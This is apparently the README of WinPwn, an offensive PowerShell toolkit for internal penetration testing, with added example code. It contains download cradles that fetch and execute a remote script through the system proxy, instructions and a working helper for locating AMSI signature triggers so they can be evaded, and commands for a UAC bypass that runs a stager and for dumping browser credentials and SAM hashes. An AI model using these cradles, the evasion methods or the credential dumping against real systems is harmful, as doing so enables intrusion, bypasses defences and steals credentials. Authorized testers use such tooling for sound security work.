Sponsored by

<img src="https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/happy_alp.png" width="300" height="300">      

WinPwn

In many past internal penetration tests I ran into problems with the existing PowerShell recon and exploitation scripts because they lacked proxy support: in a proxied corporate network a download cradle that does not pick up the system proxy simply fails. I also found myself running the same scripts one after another to gather information about the current host and/or the domain. To automate as much of the internal penetration test workflow as possible (reconnaissance as well as exploitation), and to solve the proxy problem, I wrote my own script with automatic proxy detection and integration. The script is largely built on well-known offensive security PowerShell projects.

Any suggestions, feedback, Pull requests and comments are welcome!

Just import the module with:

```powershell
Import-Module .\WinPwn.ps1
```

or

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
```
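The one-liner above fails on hosts that can only reach the internet through an authenticating proxy, which is the situation that motivated WinPwn's proxy handling. The following is an added example, not WinPwn's own loader, of what "automatic proxy recognition" looks like in a download cradle: it picks up the system proxy, attaches the current user's credentials for proxy authentication, reports which proxy (if any) applies to the target URL, and falls back to a local WinPwn_Repo server. The function names and the fallback URL are assumptions for illustration.

```powershell
# Added example (not WinPwn's own code): a proxy-aware download cradle.
# Assumptions: $Url is the raw WinPwn.ps1; $FallbackUrl is a Get_WinPwn_Repo.sh
# server you run yourself on the internal network (hypothetical address).

function Get-ProxyAwareWebClient {
    $wc = New-Object System.Net.WebClient
    # WinHTTP / IE proxy settings: explicit proxy, PAC script, or none at all
    $proxy = [System.Net.WebRequest]::GetSystemWebProxy()
    # Authenticating proxies (NTLM/Kerberos) need the logged-on user's credentials
    $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
    $wc.Proxy = $proxy
    $wc.UseDefaultCredentials = $true
    # Some proxies drop requests carrying the empty .NET default User-Agent
    $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
    return $wc
}

function Import-WinPwnViaProxy {
    param(
        [string]$Url = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1',
        # Assumption: address of a local offline repo started with Get_WinPwn_Repo.sh --start-server
        [string]$FallbackUrl = 'http://192.168.1.10:8000/WinPwn_Repo/WinPwn.ps1'
    )
    $wc  = Get-ProxyAwareWebClient
    $uri = [System.Uri]$Url

    # Show what the proxy configuration actually resolves to for this host
    if ($wc.Proxy.IsBypassed($uri)) {
        Write-Host "[*] $($uri.Host) is on the proxy bypass list, connecting directly"
    } else {
        Write-Host "[*] Using proxy $($wc.Proxy.GetProxy($uri)) for $($uri.Host)"
    }

    try {
        $script = $wc.DownloadString($Url)
    } catch [System.Net.WebException] {
        # Typical causes: 407 Proxy Authentication Required, TLS inspection, no egress
        Write-Warning "Download failed ($($_.Exception.Message)), trying local repo $FallbackUrl"
        $script = $wc.DownloadString($FallbackUrl)
    }

    # Same effect as the README's iex one-liner, but through the detected proxy
    Invoke-Expression $script
}

Import-WinPwnViaProxy
```

If the proxy still returns 407 with `DefaultCredentials`, the proxy usually expects a different account than the one running the shell; run the cradle from a process started with that user's token rather than hard-coding credentials in the script.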

To get past AMSI, take one of the existing bypass techniques, find the string that triggers the AMSI signature and change it manually in the bypass function, or encode the trigger string. Alternatively, obfuscate the whole script. Signatures are updated regularly, so a bypass that is clean today may be flagged after the next definition update; re-check it on a current Defender build before each engagement.
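Finding the trigger string by trial and error is slow. The following added example, which is not part of WinPwn, asks the local AMSI provider directly through the documented `amsi.dll` API: it first scans the whole script to confirm it is flagged at all, then scans line by line and reports the lines that produce a detection. The type name `AmsiProbe` and the function `Find-AmsiTrigger` are assumed names for this example. It only reports results; it does not disable or patch anything, and on a host without an active AMSI provider every line reports as clean.

```powershell
# Added example (not WinPwn code): report which lines of a script AMSI flags,
# using the documented AmsiInitialize / AmsiScanString / AmsiUninitialize API.
# Run it on a host with a live AV/AMSI provider (e.g. Defender with real-time protection).

$AmsiProbeSource = @"
using System;
using System.Runtime.InteropServices;
public static class AmsiProbe {
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiInitialize(string appName, out IntPtr context);
    [DllImport("amsi.dll")]
    public static extern void AmsiUninitialize(IntPtr context);
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiScanString(IntPtr context, string content,
        string contentName, IntPtr session, out int result);
}
"@
if (-not ('AmsiProbe' -as [type])) { Add-Type -TypeDefinition $AmsiProbeSource }

# AMSI_RESULT_DETECTED; any result at or above this value is a detection
$script:AmsiDetected = 32768

function Test-AmsiContent {
    param([IntPtr]$Context, [string]$Content, [string]$Name)
    $res = 0
    $hr = [AmsiProbe]::AmsiScanString($Context, $Content, $Name, [IntPtr]::Zero, [ref]$res)
    if ($hr -ne 0) { throw ("AmsiScanString failed: 0x{0:X8}" -f $hr) }
    return ($res -ge $script:AmsiDetected)
}

function Find-AmsiTrigger {
    param([Parameter(Mandatory)][string]$Path)

    $ctx = [IntPtr]::Zero
    $hr = [AmsiProbe]::AmsiInitialize('AmsiTriggerFinder', [ref]$ctx)
    if ($hr -ne 0) { throw ("AmsiInitialize failed: 0x{0:X8}" -f $hr) }

    try {
        $lines = Get-Content -Path $Path
        # Whole-file scan first: if nothing fires here, per-line scanning is pointless
        if (-not (Test-AmsiContent -Context $ctx -Content ($lines -join "`n") -Name $Path)) {
            Write-Host "[*] $Path is not flagged by the local AMSI provider"
            return
        }
        Write-Host "[!] $Path is flagged, scanning line by line"

        $hits = for ($i = 0; $i -lt $lines.Count; $i++) {
            if ([string]::IsNullOrWhiteSpace($lines[$i])) { continue }
            if (Test-AmsiContent -Context $ctx -Content $lines[$i] -Name "$Path#$($i + 1)") {
                [pscustomobject]@{ Line = $i + 1; Text = $lines[$i].Trim() }
            }
        }
        if (-not $hits) {
            # Signature matches a pattern spanning several lines; bisect by chunks instead
            Write-Warning 'Flagged as a whole but no single line fires: the signature spans lines'
        }
        $hits
    } finally {
        [AmsiProbe]::AmsiUninitialize($ctx)
    }
}

# Usage: Find-AmsiTrigger -Path .\WinPwn.ps1 | Format-Table -AutoSize
```

Each reported line is a candidate to rewrite or encode as described above; after changing it, run the function again, because removing one trigger often exposes the next one.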

If you find yourself on a Windows system with no internet access, that is no problem at all: use Offline_Winpwn.ps1, which has the most important scripts and executables embedded.

Functions available after Import: (screenshot of the function list in the repository README)

Without parameters, most of the functions can only be used from an interactive shell, so I added the -noninteractive and -consoleoutput parameters to make the script usable from an asynchronous C2 framework such as Empire, Covenant, Cobalt Strike or others. The -repo parameter was also added so that WinPwn can be used with all its features from a local repository. They are used as follows:

Usage:

- `-noninteractive` -> no prompts; functions run with predefined or user-supplied parameters
- `-consoleoutput` -> the loot/report folders are not created; every function returns its output to the console so you can read it in the agent logs of your C2 framework

Examples:

- `WinPwn -noninteractive -consoleoutput -DomainRecon` -> runs every domain recon script and function; expect a very large amount of output
- `WinPwn -noninteractive -consoleoutput -Localrecon` -> enumerates as much information about the local system as possible
- `Generalrecon -noninteractive` -> executes the basic local recon functions and stores the output in the corresponding folders
- `UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp` -> executes a stager in a high-integrity process from a medium-integrity session (the account must be a member of the local Administrators group, otherwise there is nothing for UAC to elevate)
- `Kittielocal -noninteractive -consoleoutput -browsercredentials` -> dumps browser credentials via SharpWeb, returning the output to the console
- `Kittielocal -noninteractive -samdump` -> dumps the SAM NTLM hashes and stores the output in a file (requires an elevated session)
- `WinPwn -PowerSharpPack -consoleoutput -noninteractive` -> executes Seatbelt, PowerUp, Watson and other C# binaries in memory
- `Dotnetsearch -consoleoutput -noninteractive` -> searches `C:\Program Files\` and `C:\Program Files (x86)\` for .NET assemblies
- `WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo` -> uses a local web server as an offline repository so WinPwn can run without internet access

Get_WinPwn_Repo.sh:

Usage: `./Get_WinPwn_Repo.sh {Option}`

Example: `./Get_WinPwn_Repo.sh --install`

Options:

- `--install` Download the repository and place it in ./WinPwn_Repo/
- `--remove` Remove the repository ./WinPwn_Repo/
- `--reinstall` Remove the repository and download a new one to ./WinPwn_Repo/
- `--start-server` Start a Python HTTP server on port 8000
- `--help` Show this help

TO-DO

CREDITS


Legal disclaimer:

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.